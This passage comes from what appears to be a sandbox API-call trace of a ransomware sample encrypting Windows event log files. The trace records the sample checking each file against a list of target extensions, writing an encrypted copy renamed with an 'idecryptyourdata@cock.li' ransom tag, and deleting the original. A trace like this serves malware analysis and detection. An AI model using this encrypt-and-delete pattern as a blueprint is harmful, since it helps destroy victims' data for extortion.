| out: lpBuffer=0x3e08020*, lpNumberOfBytesRead=0x30cfecc*=0x0, lpOverlapped=0x0) returned 1 [0064.241] WriteFile (in: hFile=0x368, lpBuffer=0x3e08020*, nNumberOfBytesToWrite=0x152, lpNumberOfBytesWritten=0x30cfc94, lpOverlapped=0x0 | out: lpBuffer=0x3e08020*, lpNumberOfBytesWritten=0x30cfc94*=0x152, lpOverlapped=0x0) returned 1 [0064.241] SetEndOfFile (hFile=0x368) returned 1 [0064.241] CloseHandle (hObject=0x368) returned 1 [0064.243] SetFilePointerEx (in: hFile=0x370, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30cfec0 | out: lpNewFilePointer=0x0) returned 1 [0064.243] SetEndOfFile (hFile=0x370) returned 1 [0064.244] CloseHandle (hObject=0x370) returned 1 [0064.245] SetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-CoreSystem-SmsRouter-Events%4Operational.evtx.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x20) returned 1 [0064.245] DeleteFileW (lpFileName="C:\\Logs\\Microsoft-Windows-CoreSystem-SmsRouter-Events%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-coresystem-smsrouter-events%4operational.evtx")) returned 1 [0064.245] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-CoreSystem-SmsRouter-Events%4Operational.evtx") returned 71 [0064.245] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-CoreSystem-SmsRouter-Events%4Operational.evtx") returned 71 [0064.245] lstrlenW (lpString=".doc") returned 4 [0064.245] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0064.245] lstrlenW (lpString=".docx") returned 5 [0064.245] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0064.245] lstrlenW (lpString=".pdf") returned 4 [0064.245] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0064.245] lstrlenW (lpString=".xls") returned 4 [0064.245] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0064.245] lstrlenW (lpString=".xlsx") returned 5 [0064.245] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0064.245] lstrlenW (lpString=".ppt") returned 4 [0064.245] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0064.246] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-CoreSystem-SmsRouter-Events%4Operational.evtx") returned 71 [0064.246] lstrlenW (lpString=".zip") returned 4 [0064.246] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0064.246] lstrlenW (lpString=".rar") returned 4 [0064.246] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0064.246] lstrlenW (lpString=".bz2") returned 4 [0064.246] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0064.246] lstrlenW (lpString=".7z") returned 3 [0064.246] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0064.246] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-CoreSystem-SmsRouter-Events%4Operational.evtx") returned 71 [0064.246] lstrlenW (lpString=".dbf") returned 4 [0064.246] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0064.246] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-CoreSystem-SmsRouter-Events%4Operational.evtx") returned 71 [0064.246] lstrlenW (lpString=".1cd") returned 4 [0064.246] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0064.246] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-CoreSystem-SmsRouter-Events%4Operational.evtx") returned 71 [0064.246] lstrlenW (lpString=".jpg") returned 4 [0064.246] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0064.246] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-CoreSystem-SmsRouter-Events%4Operational.evtx") returned 71 [0064.246] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-CoreSystem-SmsRouter-Events%4Operational.evtx") returned 71 [0064.246] lstrlenW (lpString=".doc") returned 4 [0064.246] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0064.246] lstrlenW (lpString=".docx") returned 5 [0064.246] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0064.246] lstrlenW (lpString=".pdf") returned 4 [0064.246] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0064.246] lstrlenW (lpString=".xls") returned 4 [0064.246] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0064.246] lstrlenW (lpString=".xlsx") returned 5 [0064.246] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0064.246] lstrlenW (lpString=".ppt") returned 4 [0064.246] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0064.247] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-CoreSystem-SmsRouter-Events%4Operational.evtx") returned 71 [0064.247] lstrlenW (lpString=".zip") returned 4 [0064.247] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0064.247] lstrlenW (lpString=".rar") returned 4 [0064.247] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0064.247] lstrlenW (lpString=".bz2") returned 4 [0064.247] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0064.247] lstrlenW (lpString=".7z") returned 3 [0064.247] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0064.247] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-CoreSystem-SmsRouter-Events%4Operational.evtx") returned 71 [0064.247] lstrlenW (lpString=".dbf") returned 4 [0064.247] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0064.247] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-CoreSystem-SmsRouter-Events%4Operational.evtx") returned 71 [0064.247] lstrlenW (lpString=".1cd") returned 4 [0064.247] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0064.247] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-CoreSystem-SmsRouter-Events%4Operational.evtx") returned 71 [0064.247] lstrlenW (lpString=".jpg") returned 4 [0064.247] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0064.247] lstrcmpiW (lpString1=".evtx", lpString2=".bat") returned 1 [0064.247] lstrlenW (lpString="Microsoft-Windows-Crypto-DPAPI%4BackUpKeySvc.evtx") returned 49 [0064.247] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Crypto-DPAPI%4BackUpKeySvc.evtx" (normalized: "c:\\logs\\microsoft-windows-crypto-dpapi%4backupkeysvc.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x370 [0064.248] GetFileSizeEx (in: hFile=0x370, lpFileSize=0x30cff14 | out: lpFileSize=0x30cff14*=69632) returned 1 [0064.248] CloseHandle (hObject=0x370) returned 1 [0064.248] GetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-Crypto-DPAPI%4BackUpKeySvc.evtx" (normalized: "c:\\logs\\microsoft-windows-crypto-dpapi%4backupkeysvc.evtx")) returned 0x20 [0064.248] GetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-Crypto-DPAPI%4BackUpKeySvc.evtx.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\logs\\microsoft-windows-crypto-dpapi%4backupkeysvc.evtx.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0064.248] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Crypto-DPAPI%4BackUpKeySvc.evtx" (normalized: "c:\\logs\\microsoft-windows-crypto-dpapi%4backupkeysvc.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x370 [0064.248] SetFilePointerEx (in: hFile=0x370, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30cfec0 | out: lpNewFilePointer=0x0) returned 1 [0064.248] SetFilePointerEx (in: hFile=0x370, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30cfec0 | out: lpNewFilePointer=0x0) returned 1 [0064.248] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Crypto-DPAPI%4BackUpKeySvc.evtx.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\logs\\microsoft-windows-crypto-dpapi%4backupkeysvc.evtx.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x368 [0064.248] GetLastError () returned 0x0 [0064.248] ReadFile (in: hFile=0x370, lpBuffer=0x3e08020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x30cfecc, lpOverlapped=0x0 | out: lpBuffer=0x3e08020*, lpNumberOfBytesRead=0x30cfecc*=0x11000, lpOverlapped=0x0) returned 1 [0064.258] WriteFile (in: hFile=0x368, lpBuffer=0x3e08020*, nNumberOfBytesToWrite=0x11010, lpNumberOfBytesWritten=0x30cfc94, lpOverlapped=0x0 | out: lpBuffer=0x3e08020*, lpNumberOfBytesWritten=0x30cfc94*=0x11010, lpOverlapped=0x0) returned 1 [0064.259] ReadFile (in: hFile=0x370, lpBuffer=0x3e08020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x30cfecc, lpOverlapped=0x0 | out: lpBuffer=0x3e08020*, lpNumberOfBytesRead=0x30cfecc*=0x0, lpOverlapped=0x0) returned 1 [0064.259] WriteFile (in: hFile=0x368, lpBuffer=0x3e08020*, nNumberOfBytesToWrite=0x136, lpNumberOfBytesWritten=0x30cfc94, lpOverlapped=0x0 | out: lpBuffer=0x3e08020*, lpNumberOfBytesWritten=0x30cfc94*=0x136, lpOverlapped=0x0) returned 1 [0064.259] SetEndOfFile (hFile=0x368) returned 1 [0064.260] CloseHandle (hObject=0x368) returned 1 [0064.261] SetFilePointerEx (in: hFile=0x370, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30cfec0 | out: lpNewFilePointer=0x0) returned 1 [0064.261] SetEndOfFile (hFile=0x370) returned 1 [0064.263] CloseHandle (hObject=0x370) returned 1 [0064.263] SetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-Crypto-DPAPI%4BackUpKeySvc.evtx.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x20) returned 1 [0064.263] DeleteFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Crypto-DPAPI%4BackUpKeySvc.evtx" (normalized: "c:\\logs\\microsoft-windows-crypto-dpapi%4backupkeysvc.evtx")) returned 1 [0064.263] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Crypto-DPAPI%4BackUpKeySvc.evtx") returned 57 [0064.263] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Crypto-DPAPI%4BackUpKeySvc.evtx") returned 57 [0064.263] lstrlenW (lpString=".doc") returned 4 [0064.263] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0064.263] lstrlenW (lpString=".docx") returned 5 [0064.263] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0064.263] lstrlenW (lpString=".pdf") returned 4 [0064.263] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0064.263] lstrlenW (lpString=".xls") returned 4 [0064.263] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0064.263] lstrlenW (lpString=".xlsx") returned 5 [0064.264] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0064.264] lstrlenW (lpString=".ppt") returned 4 [0064.264] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0064.264] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Crypto-DPAPI%4BackUpKeySvc.evtx") returned 57 [0064.264] lstrlenW (lpString=".zip") returned 4 [0064.264] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0064.264] lstrlenW (lpString=".rar") returned 4 [0064.264] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0064.264] lstrlenW (lpString=".bz2") returned 4 [0064.264] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0064.264] lstrlenW (lpString=".7z") returned 3 [0064.264] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0064.264] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Crypto-DPAPI%4BackUpKeySvc.evtx") returned 57 [0064.264] lstrlenW (lpString=".dbf") returned 4 [0064.264] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0064.264] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Crypto-DPAPI%4BackUpKeySvc.evtx") returned 57 [0064.264] lstrlenW (lpString=".1cd") returned 4 [0064.264] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0064.264] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Crypto-DPAPI%4BackUpKeySvc.evtx") returned 57 [0064.264] lstrlenW (lpString=".jpg") returned 4 [0064.264] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0064.264] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Crypto-DPAPI%4BackUpKeySvc.evtx") returned 57 [0064.264] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Crypto-DPAPI%4BackUpKeySvc.evtx") returned 57 [0064.264] lstrlenW (lpString=".doc") returned 4 [0064.264] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0064.264] lstrlenW (lpString=".docx") returned 5 [0064.264] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0064.264] lstrlenW (lpString=".pdf") returned 4 [0064.264] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0064.264] lstrlenW (lpString=".xls") returned 4 [0064.264] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0064.265] lstrlenW (lpString=".xlsx") returned 5 [0064.265] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0064.265] lstrlenW (lpString=".ppt") returned 4 [0064.265] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0064.265] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Crypto-DPAPI%4BackUpKeySvc.evtx") returned 57 [0064.265] lstrlenW (lpString=".zip") returned 4 [0064.265] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0064.265] lstrlenW (lpString=".rar") returned 4 [0064.265] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0064.265] lstrlenW (lpString=".bz2") returned 4 [0064.265] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0064.265] lstrlenW (lpString=".7z") returned 3 [0064.265] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0064.265] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Crypto-DPAPI%4BackUpKeySvc.evtx") returned 57 [0064.265] lstrlenW (lpString=".dbf") returned 4 [0064.265] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0064.265] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Crypto-DPAPI%4BackUpKeySvc.evtx") returned 57 [0064.265] lstrlenW (lpString=".1cd") returned 4 [0064.265] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0064.265] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Crypto-DPAPI%4BackUpKeySvc.evtx") returned 57 [0064.265] lstrlenW (lpString=".jpg") returned 4 [0064.265] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0064.265] lstrcmpiW (lpString1=".evtx", lpString2=".bat") returned 1 [0064.265] lstrlenW (lpString="Microsoft-Windows-Crypto-DPAPI%4Operational.evtx") returned 48 [0064.265] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Crypto-DPAPI%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-crypto-dpapi%4operational.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x37c [0064.402] GetFileSizeEx (in: hFile=0x37c, lpFileSize=0x30cff14 | out: lpFileSize=0x30cff14*=69632) returned 1 [0064.402] CloseHandle (hObject=0x37c) returned 1 [0064.402] GetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-Crypto-DPAPI%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-crypto-dpapi%4operational.evtx")) returned 0x20 [0064.402] GetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-Crypto-DPAPI%4Operational.evtx.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\logs\\microsoft-windows-crypto-dpapi%4operational.evtx.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0064.402] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Crypto-DPAPI%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-crypto-dpapi%4operational.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x37c [0064.403] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30cfec0 | out: lpNewFilePointer=0x0) returned 1 [0064.403] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30cfec0 | out: lpNewFilePointer=0x0) returned 1 [0064.403] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Crypto-DPAPI%4Operational.evtx.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\logs\\microsoft-windows-crypto-dpapi%4operational.evtx.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2c0 [0064.403] GetLastError () returned 0x0 [0064.403] ReadFile (in: hFile=0x37c, lpBuffer=0x3e08020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x30cfecc, lpOverlapped=0x0 | out: lpBuffer=0x3e08020*, lpNumberOfBytesRead=0x30cfecc*=0x11000, lpOverlapped=0x0) returned 1 [0064.405] WriteFile (in: hFile=0x2c0, lpBuffer=0x3e08020*, nNumberOfBytesToWrite=0x11010, lpNumberOfBytesWritten=0x30cfc94, lpOverlapped=0x0 | out: lpBuffer=0x3e08020*, lpNumberOfBytesWritten=0x30cfc94*=0x11010, lpOverlapped=0x0) returned 1 [0064.407] ReadFile (in: hFile=0x37c, lpBuffer=0x3e08020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x30cfecc, lpOverlapped=0x0 | out: lpBuffer=0x3e08020*, lpNumberOfBytesRead=0x30cfecc*=0x0, lpOverlapped=0x0) returned 1 [0064.407] WriteFile (in: hFile=0x2c0, lpBuffer=0x3e08020*, nNumberOfBytesToWrite=0x134, lpNumberOfBytesWritten=0x30cfc94, lpOverlapped=0x0 | out: lpBuffer=0x3e08020*, lpNumberOfBytesWritten=0x30cfc94*=0x134, lpOverlapped=0x0) returned 1 [0064.407] SetEndOfFile (hFile=0x2c0) returned 1 [0064.407] CloseHandle (hObject=0x2c0) returned 1 [0064.411] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30cfec0 | out: lpNewFilePointer=0x0) returned 1 [0064.411] SetEndOfFile (hFile=0x37c) returned 1 [0064.412] CloseHandle (hObject=0x37c) returned 1 [0064.412] SetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-Crypto-DPAPI%4Operational.evtx.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x20) returned 1 [0064.413] DeleteFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Crypto-DPAPI%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-crypto-dpapi%4operational.evtx")) returned 1 [0064.413] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Crypto-DPAPI%4Operational.evtx") returned 56 [0064.413] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Crypto-DPAPI%4Operational.evtx") returned 56 [0064.413] lstrlenW (lpString=".doc") returned 4 [0064.413] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0064.413] lstrlenW (lpString=".docx") returned 5 [0064.413] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0064.413] lstrlenW (lpString=".pdf") returned 4 [0064.413] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0064.413] lstrlenW (lpString=".xls") returned 4 [0064.413] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0064.413] lstrlenW (lpString=".xlsx") returned 5 [0064.413] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0064.413] lstrlenW (lpString=".ppt") returned 4 [0064.413] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0064.413] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Crypto-DPAPI%4Operational.evtx") returned 56 [0064.413] lstrlenW (lpString=".zip") returned 4 [0064.413] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0064.413] lstrlenW (lpString=".rar") returned 4 [0064.413] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0064.414] lstrlenW (lpString=".bz2") returned 4 [0064.414] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0064.414] lstrlenW (lpString=".7z") returned 3 [0064.414] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0064.414] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Crypto-DPAPI%4Operational.evtx") returned 56 [0064.414] lstrlenW (lpString=".dbf") returned 4 [0064.414] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0064.414] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Crypto-DPAPI%4Operational.evtx") returned 56 [0064.414] lstrlenW (lpString=".1cd") returned 4 [0064.414] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0064.414] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Crypto-DPAPI%4Operational.evtx") returned 56 [0064.414] lstrlenW (lpString=".jpg") returned 4 [0064.414] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0064.414] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Crypto-DPAPI%4Operational.evtx") returned 56 [0064.414] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Crypto-DPAPI%4Operational.evtx") returned 56 [0064.414] lstrlenW (lpString=".doc") returned 4 [0064.414] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0064.414] lstrlenW (lpString=".docx") returned 5 [0064.414] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0064.414] lstrlenW (lpString=".pdf") returned 4 [0064.414] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0064.414] lstrlenW (lpString=".xls") returned 4 [0064.414] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0064.414] lstrlenW (lpString=".xlsx") returned 5 [0064.414] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0064.414] lstrlenW (lpString=".ppt") returned 4 [0064.414] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0064.414] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Crypto-DPAPI%4Operational.evtx") returned 56 [0064.414] lstrlenW (lpString=".zip") returned 4 [0064.414] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0064.414] lstrlenW (lpString=".rar") returned 4 [0064.414] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0064.414] lstrlenW (lpString=".bz2") returned 4 [0064.414] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0064.415] lstrlenW (lpString=".7z") returned 3 [0064.415] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0064.415] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Crypto-DPAPI%4Operational.evtx") returned 56 [0064.415] lstrlenW (lpString=".dbf") returned 4 [0064.415] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0064.415] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Crypto-DPAPI%4Operational.evtx") returned 56 [0064.415] lstrlenW (lpString=".1cd") returned 4 [0064.415] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0064.415] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Crypto-DPAPI%4Operational.evtx") returned 56 [0064.415] lstrlenW (lpString=".jpg") returned 4 [0064.415] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0064.415] lstrcmpiW (lpString1=".evtx", lpString2=".bat") returned 1 [0064.415] lstrlenW (lpString="Microsoft-Windows-DeviceSetupManager%4Admin.evtx") returned 48 [0064.415] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-DeviceSetupManager%4Admin.evtx" (normalized: "c:\\logs\\microsoft-windows-devicesetupmanager%4admin.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x37c [0064.415] GetFileSizeEx (in: hFile=0x37c, lpFileSize=0x30cff14 | out: lpFileSize=0x30cff14*=69632) returned 1 [0064.415] CloseHandle (hObject=0x37c) returned 1 [0064.415] GetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-DeviceSetupManager%4Admin.evtx" (normalized: "c:\\logs\\microsoft-windows-devicesetupmanager%4admin.evtx")) returned 0x20 [0064.415] GetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-DeviceSetupManager%4Admin.evtx.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\logs\\microsoft-windows-devicesetupmanager%4admin.evtx.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0064.416] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-DeviceSetupManager%4Admin.evtx" (normalized: "c:\\logs\\microsoft-windows-devicesetupmanager%4admin.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x37c [0064.416] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30cfec0 | out: lpNewFilePointer=0x0) returned 1 [0064.416] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30cfec0 | out: lpNewFilePointer=0x0) returned 1 [0064.416] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-DeviceSetupManager%4Admin.evtx.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\logs\\microsoft-windows-devicesetupmanager%4admin.evtx.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x370 [0064.429] GetLastError () returned 0x0 [0064.429] ReadFile (in: hFile=0x37c, lpBuffer=0x3e08020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x30cfecc, lpOverlapped=0x0 | out: lpBuffer=0x3e08020*, lpNumberOfBytesRead=0x30cfecc*=0x11000, lpOverlapped=0x0) returned 1 [0064.436] WriteFile (in: hFile=0x370, lpBuffer=0x3e08020*, nNumberOfBytesToWrite=0x11010, lpNumberOfBytesWritten=0x30cfc94, lpOverlapped=0x0 | out: lpBuffer=0x3e08020*, lpNumberOfBytesWritten=0x30cfc94*=0x11010, lpOverlapped=0x0) returned 1 [0064.437] ReadFile (in: hFile=0x37c, lpBuffer=0x3e08020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x30cfecc, lpOverlapped=0x0 | out: lpBuffer=0x3e08020*, lpNumberOfBytesRead=0x30cfecc*=0x0, lpOverlapped=0x0) returned 1 [0064.437] WriteFile (in: hFile=0x370, lpBuffer=0x3e08020*, nNumberOfBytesToWrite=0x134, lpNumberOfBytesWritten=0x30cfc94, lpOverlapped=0x0 | out: lpBuffer=0x3e08020*, lpNumberOfBytesWritten=0x30cfc94*=0x134, lpOverlapped=0x0) returned 1 [0064.437] SetEndOfFile (hFile=0x370) returned 1 [0064.437] CloseHandle (hObject=0x370) returned 1 [0064.439] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30cfec0 | out: lpNewFilePointer=0x0) returned 1 [0064.439] SetEndOfFile (hFile=0x37c) returned 1 [0064.440] CloseHandle (hObject=0x37c) returned 1 [0064.440] SetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-DeviceSetupManager%4Admin.evtx.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x20) returned 1 [0064.441] DeleteFileW (lpFileName="C:\\Logs\\Microsoft-Windows-DeviceSetupManager%4Admin.evtx" (normalized: 